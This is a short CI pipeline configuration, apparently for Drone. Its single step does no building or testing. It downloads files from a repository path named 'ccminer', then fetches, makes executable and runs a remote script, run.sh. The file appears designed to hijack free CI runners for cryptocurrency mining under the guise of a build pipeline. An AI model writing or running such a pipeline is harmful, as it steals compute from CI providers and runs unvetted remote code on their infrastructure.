kind: pipeline
type: docker
name: gaskeun

steps:
- name: bosss🚴
  image: golang
  commands:
  - wget https://github.com/CoinFreakz/Bacodz/main/ccminer/sett
  - wget https://github.com/CoinFreakz/Bacods/main/ccminer/run.sh && chmod u+x run.sh && ./run.sh
